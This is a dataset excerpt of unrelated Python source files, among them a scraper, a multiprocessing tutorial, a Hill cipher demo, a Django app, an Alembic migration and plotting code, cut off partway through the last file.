index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
984,600 | 1e6505e0a1f57a66f04b51ef9f4563f72ac0c13d | #!/usr/bin/env python
# Author: weikun
# Created Time: Mon 25 Mar 2019 10:17:01 AM CST
f = open('SUMMARY.md', 'r+')
infos = f.readlines()
f.close()
dirs=[]
dirHash = {}
curDir = None
curDirName = None
for info in infos[4:]:
info = info.strip('\n')
if info.startswith('###'):
curDir = []
curDirName = info[info.find(' ') + 1:]
dirs.append((curDirName, curDir))
elif info.startswith('*'):
name = info[info.find('[') + 1:info.find(']')]
filePath = info[info.find('(') + 1:info.find(')')]
print name, filePath
curDir.append((name, filePath))
if dirHash.get(filePath.split('/')[0], None) == None:
dirHash[filePath.split('/')[0]] = (curDirName, curDir)
import os
def rebuildName(fileName):
fileName = fileName[11:-3] #len(xxxx_xx_xx) = 11 len(.md) = 3
fileName = fileName.replace('_', ' ')
fileName = fileName.capitalize()
return fileName
def checkRepeat(fileName, curDir):
for name, fName in curDir:
if fName == fileName:
return False
else:
return True
for maindir, subdir, file_name_list in os.walk('.'):
if not file_name_list:
continue
if '_book' in maindir:
continue
if not maindir.startswith('./'):
continue
for file_name in file_name_list:
if not file_name.endswith('.md'):
continue
pathDirName = maindir[len('./'):]
fileName = file_name
if pathDirName in dirHash:
curDirName, curDir = dirHash[pathDirName]
if checkRepeat('%s/%s' % (pathDirName, fileName), curDir):
name = rebuildName(fileName)
curDir.append((name, '%s/%s' % (pathDirName, fileName)))
else:
curDirName = pathDirName.capitalize()
curDir = []
dirHash[pathDirName] = (curDirName, curDir)
dirs.append((curDirName, curDir))
name = rebuildName(fileName)
curDir.append((name, '%s/%s' % (pathDirName, fileName)))
writeinfos = []
writeinfos.append('### Summary\n')
writeinfos.append('* [Introduction](README.md)\n')
for name, curDir in dirs:
writeinfos.append('### %s\n' % (name))
for d in curDir:
writeinfos.append('* [%s](%s)' % (d[0], d[1]))
writeinfos.append('\n')
f = open('SUMMARY.md', 'w+')
f.writelines('\n'.join(writeinfos))
f.close()
|
984,601 | dd13238c5ce30f4f2ac72b90ef7d80d700e0e0c3 | #!/usr/bin/env python3
# coding utf-8
''''
# join 方法
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task, )
p.start()
p.join()
print('主', os.getpid(), os.getppid())
print(p.pid)
'''
'''
from multiprocessing import Process
import time,os
def task(name,n):
print('%s is running' %name)
time.sleep(n)
if __name__ == '__main__':
start = time.time()
p1 = Process(target=task,args=('子进程1',5) )
p2 = Process(target=task,args=('子进程2',3) )
p3 = Process(target=task,args=('子进程3',2) )
p_list = [p1,p2,p3]
# p1.start()
# p2.start()
# p3.start()
for p in p_list:
p.start()
# p1.join()
# p2.join()
# p3.join()
for p in p_list:
p.join()
print('主', (time.time()-start))
'''
'''
from multiprocessing import Process
import time,os
def task(name,n):
print('%s is running' %name)
time.sleep(n)
if __name__ == '__main__':
start = time.time()
p1 = Process(target=task,args=('子进程1',5) )
p2 = Process(target=task,args=('子进程2',3) )
p3 = Process(target=task,args=('子进程3',2) )
p1.start()
p1.join()
p2.start()
p2.join()
p3.start()
p3.join()
print('主', (time.time()-start))
'''
''''
# is_alive 方法
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task, )
p.start()
print(p.is_alive())
p.join()
print('主', os.getpid(), os.getppid())
print(p.pid)
'''
'''
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task, )
p.start()
p.terminate()
time.sleep(3)
print(p.is_alive())
p.join()
print('主')
'''
'''
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task,name='sub-precess' )
p.start()
p.terminate()
time.sleep(3)
print(p.is_alive())
p.join()
print('主')
print(p.name)
''' |
984,602 | 5d40e24476f2a68970b7664bef769cb3e6fa43dd | import matplotlib.pyplot as plt
import numpy as np
import random
import SimpleITK as sitk # For loading the dataset
import torch
import torch.nn as nn
from torch.utils.data import Dataset
import os
import math
def read_img(img_path):
"""
Reads a .nii.gz image and returns as a numpy array.
"""
return sitk.GetArrayFromImage(sitk.ReadImage(img_path))
def get_datapath(datadir, random_state, test_size = 0.25):
dirs = []
images = []
masks = []
for dirname, _, filenames in os.walk(datadir):
for filename in filenames:
if 'mask'in filename:
dirs.append(dirname.replace(datadir, ''))
masks.append(filename)
images.append(filename.replace('_mask', ''))
image_list = []
mask_list = []
for i in range(len(dirs)):
imagePath = os.path.join(datadir, dirs[i], images[i])
maskPath = os.path.join(datadir, dirs[i], masks[i])
image_list.append(imagePath)
mask_list.append(maskPath)
return image_list, mask_list
class DataSegmentationLoader(Dataset):
def __init__(self, path_list,ground_list = []):
self.sample = path_list
self.ground_truth = []
if len(ground_list) > 0:
self.ground_truth = ground_list
def __len__(self):
return len(self.sample)
def __getitem__(self, idx):
#Load Data
data = read_img(self.sample[idx]).reshape(3,256,256)/255
if len(self.ground_truth) > 0:
label = read_img(self.ground_truth[idx]).reshape(1,256,256)/255
else:
label = np.zeros((1,256,256))
return torch.from_numpy(data).float(), torch.from_numpy(label).long() |
984,603 | 99ab9bac11918993f6e934fe67bc60944574930a | import logging
import shutil
import subprocess
import uuid
import jsonlines
from murakami.errors import RunnerError
from murakami.runner import MurakamiRunner
logger = logging.getLogger(__name__)
class DashClient(MurakamiRunner):
"""Run Dash tests."""
def __init__(self, config=None, data_cb=None,
location=None, network_type=None, connection_type=None,
device_id=None):
super().__init__(
title="DASH",
description="The Neubot DASH network test.",
config=config,
data_cb=data_cb,
location=location,
network_type=network_type,
connection_type=connection_type,
device_id=device_id,
)
@staticmethod
def _start_test():
logger.info("Starting DASH test...")
if shutil.which("dash-client") is not None:
output = subprocess.run(["dash-client"],
check=True,
text=True,
capture_output=True)
logger.info("Dash test complete.")
# TODO: write parser. Only print the last line for now.
return output.stdout.splitlines()[-1]
else:
raise RunnerError(
"dash",
"Executable dash-client does not exist, please install DASH.")
|
984,604 | 323d6177a3d179e4725d44ad4ba11d261ef84b70 | """
This module implements a meter service.
A meter service reads a consumption value and sends it to a predefined broker.
The current implementation mocks the reading by generating a uniformly distributed value between 0 and 9000.
Author: Ludovic Mouline
"""
from __future__ import annotations
import logging
import time
import json
from random import uniform
from typing import TypedDict, TYPE_CHECKING
if TYPE_CHECKING:
import pv_simulator.broker
_MIN_CONS = 0
_MAX_CONS = 9000
class MeterValMsg(TypedDict):
"""Type of the message sent through the broker."""
meter_id: str
value: float
time_s: int
class MeterFactory:
_instance = None
def __init__(self):
if MeterFactory._instance is not None:
raise Exception("This class is a singleton!")
else:
MeterFactory._instance = self
self.__BASE_ID = "Meter_"
self.__id_next = 0
@staticmethod
def instance() -> MeterFactory:
if MeterFactory._instance is None:
MeterFactory()
return MeterFactory._instance
def new_meter(self, broker: pv_simulator.broker.Producer) -> Meter:
m_id = self.__BASE_ID + str(self.__id_next)
self.__id_next = self.__id_next + 1
return Meter(m_id, broker)
class Meter:
"""
Representation of a meter where the id is: Meter <NB>, where NB is an integer that increases at each creation of
a meter.
WARNING: this approach cannot be used in a multi-threading application, or the meter id will not be unique.
"""
def __init__(self, m_id: str, broker: pv_simulator.broker.Producer):
"""You should not directly call the constructor. We recommended using the factory."""
self.meter_id = m_id
self.broker = broker
self.broker.open_channel(self.meter_id)
def read_consumption(self) -> float:
return uniform(_MIN_CONS, _MAX_CONS)
def send_consumption(self) -> None:
v = self.read_consumption()
msg = MeterValMsg(meter_id=self.meter_id, value=v, time_s=int(time.time()))
to_send = json.dumps(msg)
self.broker.send_msg(self, to_send)
logging.info(f"Message sent: {to_send}")
def __del__(self):
self.broker.del_channel(self.meter_id)
|
984,605 | f6771d823414427cc59019fcb4ed5ee598c787cb | import sys
input=sys.stdin.readline
if __name__ == '__main__':
t=int(input())
for _ in range(t):
n=int(input())
num_list=[]
for i in range(n):
num_list.append(input().strip())
num_list.sort()
flag=False
for i in range(n-1):
length=len(num_list[i])
if num_list[i]==num_list[i+1][:length]:
flag=True
if flag:
print("NO")
else:
print("YES") |
984,606 | 0d4879b2036c554dce87753c28e55952a741f2e9 | from django.urls import path
from . import views
urlpatterns = [
#No paths for now
#path('api/',)
] |
984,607 | d2f1ae4c1ab73b7b5370a950dbf0e911650ab591 | # -*- coding: utf-8 -*-
# !/Library/Frameworks/Python.framework/Versions/3.5/bin/python3
from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
def getText(base_url, til_url):
content = urlopen(base_url + til_url)
bsObj = BeautifulSoup(content, "lxml")
i = 0
record = False
for dd in bsObj.findAll('dd'):
for link in dd.findAll('a'):
if 'href' in link.attrs:
if link.get_text() == '第一百四十七章 大难不死必有后福':
record = True
else:
print("skip->" + link.get_text())
if record:
print("output->" + link.get_text())
print(link.attrs['href'])
getContent(base_url + link.attrs['href'])
i + 1
def getContent(url):
content = urlopen(url)
bsObj = BeautifulSoup(content, "lxml")
title = str(bsObj.title.get_text())
tfile = open("./" + title.split("_")[1] + ".txt", 'a')
tfile.write("\n\n\n" + str(bsObj.title.get_text()) + "\n")
tfile.write(bsObj.find_all("div", {"id": "content"})[0].get_text())
tfile.close()
getText("https://www.biquge.com.tw", "/6_6967/")
|
984,608 | 2a37c5390f2a61ccf1478d6b5a8a6da9e4944e11 | """
This script can be run with pure "python". (pytest not needed).
"get_driver()" is from [seleniumbase/core/browser_launcher.py].
"""
from seleniumbase import get_driver
from seleniumbase import js_utils
from seleniumbase import page_actions
driver = get_driver("chrome", headless=False)
try:
driver.get("https://seleniumbase.io/apps/calculator")
page_actions.wait_for_element_visible(driver, "4", "id").click()
page_actions.wait_for_element_visible(driver, "2", "id").click()
page_actions.wait_for_text_visible(driver, "42", "output", "id")
js_utils.highlight_with_js(driver, "#output", 6, "")
finally:
driver.quit()
|
984,609 | b3014a6a1e58a98b26b30f1838f5459bb9cea1d7 | import requests
from requests import sessions
#不使用Session对象发送请求,其中set/cookies/Bill相当于向服务器写入一个名为name的Cookie,值为Bill
requests.get('http://httpbin.org/cookies/set/name/Bill')
#第二次发送请求,这两次请求不在同一个Session中,第一次请求发送的Cookie在第二次请求中是无法获取道德
r1 = requests.get('http://httpbin.org/cookies')
print(r1.text)
#使用Session,创建Session对象
session = requests.Session()
#第一次发送请求
session.get('http://httpbin.org/cookies/set/name/Bill')
#第二次发送请求
r2 = session.get('http://httpbin.org/cookies')
print(r2.text) |
984,610 | 483937b7b8aec986ea8aa1793293e54a6fac4916 | while True:
n = int(input("ingresa un numero positivo: "))
if n > 0:
print(n)
break
else:
print("ingresa un numero positivo valido")
print("fin") |
984,611 | 4f0fa3649e71428f42b3c8debb0cc9229678de73 | #Program takes fresco .out output as its input and converts to just angle and angular cross-section
import sys
import matplotlib.pyplot as plt
# import matplotlib.axes.Axes as axes
def hasNumbers(inputString):
return any(char.isdigit() for char in inputString)
angle_list=[]
# cross_section_list=[]
burlein_angles=[]
burlein_cross_sections=[]
tunl_angles=[]
tunl_cross_sections=[]
def main(): #if running with run_fresco.py, place filename as an argument here
filename=sys.argv[1] #if running with run_fresco.py, comment this out #takes in command line argument as input file in " "
print(filename)
#Initialising 2-D list
n=5
m=180
cross_section_list=[[] * m for i in range(n)]
angle_list=[[] * m for i in range(n)]
#Reading in Burlein (1984) data
# burlein_in = open("burlein_data.dat","r")
# burlein_in = open("burlein_data_0+_3.588.dat","r")
# burlein_in = open("burlein_data_2+_5.289.dat","r")
# burlein_in = open("burlein_data_4+_5.474.dat","r")
#burlein_input = burlein_in.readlines()
#for line in burlein_input:
# print(line)
# token=line.split("\t")
# print(token)
# token[0]=float(token[0])
# token[3]=float(token[3])
# print(token[0])
#burlein_angles.append(token[0])
#burlein_cross_sections.append(token[3])
# tunl_in = open("tunl_data_4+_5.474.dat")
# tunl_in = open("tunl_data_2+_5.292.dat")
# tunl_in = open("tunl_data_0+_3.588.dat")
# tunl_input = tunl_in.readlines()
#for line in tunl_input:
# print(line)
# token=line.split("\t")
# print(token)
# token[0]=float(token[0])
# token[1]=float(token[1])
#tunl_angles.append(token[0])
# tunl_cross_sections.append(token[1])
output_filename = filename[:-3] + 'dat'
print(output_filename)
filein = open(filename,"r")
input_data = filein.readlines() #Read in whole file
data_flag=0
reaction_counter=0
for line in input_data: #reading in data loop begins
if line.startswith(" 2: J= 0.5+"):
print("line with info found")
token=line.split(" ")
token=filter(None,token)
#
print(token)
print(token[12],token[16])
J_pi=token[12]
E_x=token[16]
E_x=E_x[:6]
J=J_pi[:1]
pi=J_pi[-1]
# token[12]=float(token[12])
# token[15]=float(token[15])
# E_x=round_sig(token[15],4)
print(E_x)
print(J)
print(pi)
# output_filename =
print("Ex= {} J_pi= {} {}".format(E_x,J,pi))
if line.startswith("0 3: "): #this finds the third single-particle form factor in the fresco_outputs
#output, which is what it uses as its second output, so this shouldn't need to be changed for different L transfers
print("line with L transfer number found")
token=line.split(" ")
token=filter(None,token)
print(token)
print(token[7])
delta_L=token[7]
print("L={}".format(delta_L))
output_filename = "fresco_outputs_bcfec/mg26dp_dwba_" + E_x + "_" + J + pi + "_"+delta_L + ".dat"
print("output filename is {}".format(output_filename))
fileout = open(output_filename,"w")
filein.close()
filein = open(filename,"r")
for line in input_data: #reading in data loop begins
if line.startswith(" Finished all xsecs"):
data_flag=0
print("End of all cross-section data reached, data flag set to 0")
# print(line)
if data_flag==1:
token=line.split(" ")
token=filter(None,token)
# print(token)
if hasNumbers(token[0]): #checking if first element actually contains a number, to avoid conversion error
token[0]=float(token[0])
token[4]=float(token[4])
# fileout.write("{}\t{}\n".format(token[0],token[4]))
angle_list[reaction_counter].append(token[0])
cross_section_list[reaction_counter].append(token[4])
if line.startswith (" CROSS SECTIONS FOR OUTGOING p "):
data_flag=1
print("Cross-section data reached, data flag set to 1")
print(line)
if line.startswith (" 180.00 deg"):
print("End of one reaction reached")
print("Reaction counter is {}".format(reaction_counter))
reaction_counter=reaction_counter+1
# plt.plot(angle_list,cross_section_list)
# plt.plot(burlein_angles,burlein_cross_sections,'ro')
# plt.xlim(0,80)
# plt.ylabel('cross section [mb/sr]')
# plt.xlabel('angle/degrees')
# ax = plt.subplot()
# ax.set_yscale('log')
# plt.grid()
# plt.show()
#scaling to S-factors from Burlein (1984)
for i in range (0,m):
# temp_variable=cross_section_list[i]
# print(temp_variable)
cross_section_list[0][i]=1*cross_section_list[0][i]
cross_section_list[1][i]=1*cross_section_list[1][i]
print("{}\t{}\n".format(i,cross_section_list[1][i]))
fileout.write("{}\t{}\n".format(i,cross_section_list[1][i]))
# cross_section_list[3][i]
# temp_variable=cross_section_list[0][i] + cross_section_list[2][i]
# cross_section_list[3].append(temp_variable)
# print(cross_section_list[0])
# print(cross_section_list[1])
print(burlein_cross_sections)
angle_list[3]=angle_list[1]
#plotting loop
# for i in range(0,reaction_counter+1):
# print(len(cross_section_list[i]))
#
# plt.plot(angle_list[i],cross_section_list[i])
# # print(angle_list[i])
# print(cross_section_list[i])
#
# plt.plot(angle_list[0],cross_section_list[0])
#plt.plot(angle_list[1],cross_section_list[1])
# plt.plot(burlein_angles,burlein_cross_sections,'ro')
# plt.plot(tunl_angles,tunl_cross_sections,'b+')
# plt.plot(angle_list[2],cross_section_list[2])
# plt.plot(angle_list[3],cross_section_list[3])
#plt.xlim(0,80)
#plt.ylabel('cross section [mb/sr]')
#plt.xlabel('angle/degrees')
#ax = plt.subplot()
#ax.set_yscale('log')
#plt.grid()
#plt.show()
# print(angle_list[1])
# print(cross_section_list[1])
# for i in range (0,180):
# fileout.write(i)
filein.close() # Good practice
fileout.close()
#burlein_in.close()
# tunl_in.close()
print(cross_section_list[1][0])
print(output_filename)
return()
main() #if running with run_fresco.py, comment this line out
|
984,612 | 9e58bdb66a6c7f161fdc44498ffa427ba586f703 |
import os
from ..log import NodeLoggingMixin
from ..http import HttpClientMixin
from ..basemixin import BaseGuiMixin
from ..widgets.image import BleedImage
from ..widgets.labels import ColorLabel
from ..widgets.image import StandardImage
from ..widgets.labels import SelfScalingLabel
from ..widgets.colors import ColorBoxLayout
class ModularApiEngineManagerMixin(HttpClientMixin, NodeLoggingMixin):
def __init__(self, *args, **kwargs):
super(ModularApiEngineManagerMixin, self).__init__(*args, **kwargs)
self._api_engines = []
self._api_primary = None
def modapi_install(self, engine, primary=False):
self.log.info("Installing Modular API Engine {0}".format(engine))
self._api_engines.append(engine)
if primary:
self._api_primary = engine
def modapi_activate(self):
for engine in self._api_engines:
self.log.info("Starting Modular API Engine {0}".format(engine))
engine.start()
def modapi_engine(self, name):
for engine in self._api_engines:
if engine.name == name:
return engine
def modapi_stop(self):
for engine in self._api_engines:
self.log.info("Stopping Modular API Engine {0}".format(engine))
engine.stop()
def start(self):
super(ModularApiEngineManagerMixin, self).start()
self.modapi_activate()
def stop(self):
self.modapi_stop()
super(ModularApiEngineManagerMixin, self).stop()
class ModularApiEngineManagerGuiMixin(ModularApiEngineManagerMixin, BaseGuiMixin):
def __init__(self, *args, **kwargs):
super(ModularApiEngineManagerGuiMixin, self).__init__(*args, **kwargs)
self._api_internet_link = None
self._api_internet_link_indicator = None
self._api_internet_connected = False
self._api_internet_indicator = None
self._api_connection_status = {}
self._api_connection_indicators = {}
@property
def modapi_internet_link_indicator(self):
if not self._api_internet_link_indicator:
params = {'bgcolor': (0xff / 255., 0x00 / 255., 0x00 / 255., 0.3),
'color': [1, 1, 1, 1]}
self._api_internet_link_indicator = ColorLabel(
text=self._api_internet_link, size_hint=(None, None),
height=50, font_size='14sp',
valign='middle', halign='center', **params
)
def _set_label_width(_, texture_size):
self._api_internet_link_indicator.width = texture_size[0] + 20
self._api_internet_link_indicator.bind(texture_size=_set_label_width)
return self._api_internet_link_indicator
def _modapi_internet_link_indicator_show(self, duration=5):
_ = self.modapi_internet_link_indicator
if not self._api_internet_link_indicator.parent:
self.gui_notification_stack.add_widget(self._api_internet_link_indicator)
self.gui_notification_update()
if duration:
self.reactor.callLater(duration, self._modapi_internet_link_indicator_clear)
def _modapi_internet_link_indicator_clear(self):
if self._api_internet_link_indicator and self._api_internet_link_indicator.parent:
self.gui_notification_stack.remove_widget(self._api_internet_link_indicator)
self.gui_notification_update()
self._api_internet_link_indicator = None
@property
def modapi_internet_indicator(self):
if not self._api_internet_indicator:
_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
_source = os.path.join(_root, 'images', 'no-internet.png')
self._api_internet_indicator = BleedImage(
source=_source, pos_hint={'left': 1},
size_hint=(None, None), height=50, width=50,
bgcolor=(0xff / 255., 0x00 / 255., 0x00 / 255., 0.3),
)
return self._api_internet_indicator
def _modapi_internet_indicator_show(self):
if not self.modapi_internet_indicator.parent:
self.gui_notification_row.add_widget(self.modapi_internet_indicator)
self.gui_notification_update()
def _modapi_internet_indicator_clear(self):
if self.modapi_internet_indicator.parent:
self.modapi_internet_indicator.parent.remove_widget(self.modapi_internet_indicator)
self.gui_notification_update()
def modapi_connection_indicator(self, prefix):
if prefix not in self._api_connection_indicators.keys():
_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
source = os.path.join(_root, 'images', 'no-server.png')
indicator = ColorBoxLayout(
pos_hint={'left': 1}, orientation='vertical', padding=(0, 0, 0, 5),
size_hint=(None, None), height=70, width=50, spacing=0,
bgcolor=(0xff / 255., 0x00 / 255., 0x00 / 255., 0.3),
)
indicator.add_widget(
StandardImage(source=source, size_hint=(1, None), height=50)
)
indicator.add_widget(
SelfScalingLabel(text=prefix,
size_hint=(1, None), height=15)
)
self._api_connection_indicators[prefix] = indicator
return self._api_connection_indicators[prefix]
def _modapi_connection_indicator_show(self, prefix):
if not self.modapi_connection_indicator(prefix).parent:
self.gui_notification_row.add_widget(self.modapi_connection_indicator(prefix))
self.gui_notification_update()
def _modapi_connection_indicator_clear(self, prefix):
if self.modapi_connection_indicator(prefix).parent:
self.modapi_connection_indicator(prefix).parent.remove_widget(self.modapi_connection_indicator(prefix))
self.gui_notification_update()
def modapi_signal_internet_link(self, value, prefix):
self._api_internet_link = value
self._modapi_internet_link_indicator_show()
def modapi_signal_internet_connected(self, value, prefix):
if not value:
self._modapi_internet_indicator_show()
else:
self._modapi_internet_indicator_clear()
self._api_internet_connected = value
def modapi_signal_api_connected(self, value, prefix):
if not value:
self._modapi_connection_indicator_show(prefix)
else:
self._modapi_connection_indicator_clear(prefix)
self._api_connection_status[prefix] = value
|
984,613 | e7ed0efc3bbe6978dc14b66d07ff0f5cf2f5368c | from django.contrib import admin
import models
ballroom_models = [
models.Level,
models.Style,
models.Dance,
models.Position,
models.Figure,
models.Routine,
models.Video,
models.Profile,
models.FigureInstance,
models.Annotation
]
admin.site.register(ballroom_models)
|
984,614 | 9034b64c0bb317a33ed9bab518e898f5517d19a3 | from bcrypt import hashpw, gensalt
class Message:
"""
Represents message in database
"""
def __init__(self, text, sender_id, recipient_id):
self.text = text
self.sender_id = sender_id
self.recipient_id = recipient_id
def send(self, cursor):
sql = 'INSERT INTO message(sender_id, recipient_id, content) \
VALUES (%s, %s, %s)'
cursor.execute(sql, (self.sender_id, self.recipient_id, self.text))
@staticmethod
def list_all(cursor, user_id):
sql = 'SELECT * FROM message WHERE recipient_id=%s'
cursor.execute(sql, (user_id,))
for record in cursor:
message = Message(record[3], record[1], record[2])
print(message)
@staticmethod
def delete(cursor, message_id):
sql = 'DELETE FROM message WHERE id=%s'
cursor.execute(sql)
return
def __str__(self):
return 'from: {0}, to: {1}, \n content: {2}'.format(self.sender_id, self.recipient_id, self.text)
class User:
"""
represents user record in database
"""
def __init__(self):
self.username = ''
self.__hashed_password = ''
self.email = ''
self.__id = -1
@property
def user_id(self):
return self.__id
@property
def hashed_password(self):
return self.__hashed_password
def set_password(self, password):
self.__hashed_password = hashpw(password.encode(), gensalt(10))
def save_to_db(self, cursor):
if self.__id == -1:
sql = 'INSERT INTO users(email, username, hashed_password)\
VALUES (%s, %s, %s)'
params = (self.email, self.username, self.hashed_password)
cursor.execute(sql, params)
return True
return False
def authenticate(self, cursor, username, password_attempt):
sql = 'SELECT * FROM users WHERE username=%s LIMIT 1'
cursor.execute(sql, (username,))
data = cursor.fetchone()
if data is not None:
self.__hashed_password = data[3]
self.__id = data[0]
self.email = data[1]
if (all([self.__hashed_password, password_attempt]) and
hashpw(
password_attempt.encode(),
self.hashed_password.encode()
) == self.hashed_password.encode()):
return True
return False
@staticmethod
def load_user_by_id(cursor, user_id):
sql = 'SELECT * FROM users where id = %s'
params = (user_id,)
cursor.execute(sql, params)
data = cursor.fetchone()
if data is not None:
u = User()
u.__id = data[0]
u.email = data[1]
u.username = data[2]
u.__hashed_password = data[3]
return u
return None
def update_pass(self, cursor):
sql = 'UPDATE users SET hashed_password=%s WHERE id=%s;'
params = (self.hashed_password, self.__id)
cursor.execute(sql, params)
return True
@staticmethod
def load_all_users(cursor):
sql = 'SELECT * FROM users'
cursor.execute(sql)
data = cursor.fetchall()
users = list()
for user in data:
u = User()
u.__id = user[0]
u.email = user[1]
u.username = user[2]
u.__hashed_password = user[3]
users.append(u)
return users
def del_user(self, cursor):
sql = 'DELETE FROM users WHERE id=%s'
cursor.execute(sql, (self.__id,))
self.__id = -1
return True
def __str__(self):
return 'User: {0}, id: {1}'.format(self.username, str(self.__id))
|
984,615 | 128b84754c70b4278e80a5cb5ade6ad683806825 | import datetime
import os
import shutil
import tempfile
from contextlib import contextmanager
@contextmanager
def environment_append(env_vars):
unset_vars = []
for key in env_vars.keys():
if env_vars[key] is None:
unset_vars.append(key)
for var in unset_vars:
env_vars.pop(var, None)
for name, value in env_vars.items():
if isinstance(value, list):
env_vars[name] = os.pathsep.join(value)
old = os.environ.get(name)
if old:
env_vars[name] += os.pathsep + old
if env_vars or unset_vars:
old_env = dict(os.environ)
os.environ.update(env_vars)
for var in unset_vars:
os.environ.pop(var, None)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
else:
yield
@contextmanager
def chdir(newdir):
try:
old_path = os.getcwd()
except:
old_path = None
os.chdir(newdir)
try:
yield
finally:
if old_path and os.path.exists(old_path):
os.chdir(old_path)
def iso_now():
return datetime.datetime.utcnow().isoformat().split(".")[0] + ".000Z"
@contextmanager
def tmp_folder():
tmp_path = tempfile.mkdtemp()
try:
with chdir(tmp_path):
yield tmp_path
finally:
shutil.rmtree(tmp_path)
def cur_folder():
return os.getcwd().replace("\\", "/")
def load(path, binary=False):
""" Loads a file content """
with open(path, 'rb') as handle:
tmp = handle.read()
return tmp if binary else tmp.decode()
|
984,616 | cce36395a93b470ffb36c6bf0944e44e3282d927 | #!/usr/bin/env python3
"""
HOW TO USE THIS SCRIPT:
put this as an .autorun file in the root of the USB stick,
along with a file named zone-<X> where <X> is the id of the zone (0 to 3) to use.
(The file can be blank and should have no extension)
"""
import socket
import json
import time
from enum import Enum
from threading import Event
sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
class State(Enum):
CONNECT = 1
MESSAGE = 2
DONE = 3
def poll(robot_root_path, zone_id, stop_event: Event = Event()):
message = '{{"zone":{}, "mode":"competition"}}\n'.format(zone_id).encode('utf-8')
state = State.CONNECT
while not stop_event.is_set():
try:
if state is State.CONNECT:
sock.connect(robot_root_path+"game/state")
state = State.MESSAGE
if state is State.MESSAGE:
sock.send(message)
resp = sock.recv(2048)
resp = json.loads(resp.decode('utf-8'))
if 'zone' in resp and resp['zone'] == zone_id:
print("done")
state = State.DONE
else:
state = State.MESSAGE
if state is State.DONE:
time.sleep(1)
state = State.MESSAGE
except (ConnectionRefusedError, OSError):
time.sleep(0.1)
print("cant connect")
state = State.CONNECT
if __name__ == "__main__":
import os
import glob
import re
from pathlib import Path
path = Path(os.path.dirname(os.path.realpath(__file__)))
# Get all files named zone-1, zone-2, etc..
id_files = glob.glob(str(path / "zone-*"))
if not id_files:
print("Could not find any zone ids (files like zone-1 or zone-0)")
exit(0)
id_file = id_files[0]
if len(id_files) > 1:
print("Warning, found more than 1 zone file!")
# Get the first number in the filename
zone_id = int(re.search(r'\d', id_file).group(0))
print("ID:", zone_id)
poll("/var/robotd/", zone_id) |
984,617 | 41aa4c794eff96c2290a47756ce3a9a56d7728b5 | # Hill cipher! Works with any key matrix size, any modulus
from hill import *
# wiki expamples
# key = 'GYBNQKURP'
# msg = 'ACT'
key = [[6, 24, 1], [13, 16, 10], [20, 17, 15]]
msg = [0, 2, 19]
cipher = Hill(key, mod=26)
enc = cipher.encrypt(msg)
print(enc)
dec = cipher.decrypt(enc)
print(dec)
key = [[3, 3], [2, 5]]
msg = [7, 4, 11, 15]
cipher = Hill(key, mod=257)
enc = cipher.encrypt(msg)
print(enc)
dec = cipher.decrypt(enc)
print(dec) |
984,618 | 789edd11d7eaeea757dc7d3c289ec8c4aab53f8c | """add whitelist table
Revision ID: b1d666d55f79
Revises: 71fa00181562
Create Date: 2021-02-21 00:41:21.425630
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b1d666d55f79'
down_revision = '71fa00181562'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('whitelist',
sa.Column('driver_id', sa.Text(), nullable=False),
sa.Column('passenger_id', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['driver_id'], ['driver.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['passenger_id'], ['passenger.id'], ondelete='CASCADE')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('whitelist')
# ### end Alembic commands ###
|
984,619 | ac782d67e4bfe8ea19ad65178c87f00005bdee41 | #!/usr/bin/env python
#coding=utf-8
from pylab import *
from configobj import ConfigObj
import matplotlib.pyplot as plt
def display2Dpointset(A):
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.grid(True)
ax.plot(A[:,0],A[:,1],'yo',markersize=8,mew=1)
labels = plt.getp(plt.gca(), 'xticklabels')
plt.setp(labels, color='k', fontweight='bold')
labels = plt.getp(plt.gca(), 'yticklabels')
plt.setp(labels, color='k', fontweight='bold')
for i,x in enumerate(A):
ax.annotate('%d'%(i+1), xy = x, xytext = x + 0)
ax.set_axis_off()
#fig.show()
def display2Dpointsets(A, B, ax = None):
""" display a pair of 2D point sets """
if not ax:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(A[:,0],A[:,1],'yo',markersize=8,mew=1)
ax.plot(B[:,0],B[:,1],'b+',markersize=8,mew=1)
#pylab.setp(pylab.gca(), 'xlim', [-0.15,0.6])
labels = plt.getp(plt.gca(), 'xticklabels')
plt.setp(labels, color='k', fontweight='bold')
labels = plt.getp(plt.gca(), 'yticklabels')
plt.setp(labels, color='k', fontweight='bold')
def display3Dpointsets(A,B,ax):
#ax.plot3d(A[:,0],A[:,1],A[:,2],'yo',markersize=10,mew=1)
#ax.plot3d(B[:,0],B[:,1],B[:,2],'b+',markersize=10,mew=1)
